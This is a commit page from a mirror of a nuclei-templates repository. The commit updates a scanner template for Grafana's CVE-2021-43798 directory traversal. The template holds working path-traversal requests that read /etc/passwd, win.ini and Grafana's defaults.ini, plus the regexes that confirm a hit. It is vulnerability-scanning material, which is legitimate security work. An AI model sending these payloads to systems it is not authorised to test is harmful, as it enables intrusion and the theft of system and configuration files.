daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2021-43798.yaml

patch-1
j4vaovo 2023-04-18 23:23:43 +08:00 committed by GitHub
parent deed335e1e
commit a558791c08
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
cves/2021/CVE-2021-43798.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2021-43798
info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
author: z0ne,dhiyaneshDk,j4vaovo
severity: high
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
reference:
@ -24,16 +24,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini"
- "{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
- "socket = /tmp/grafana.sock"
condition: or
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28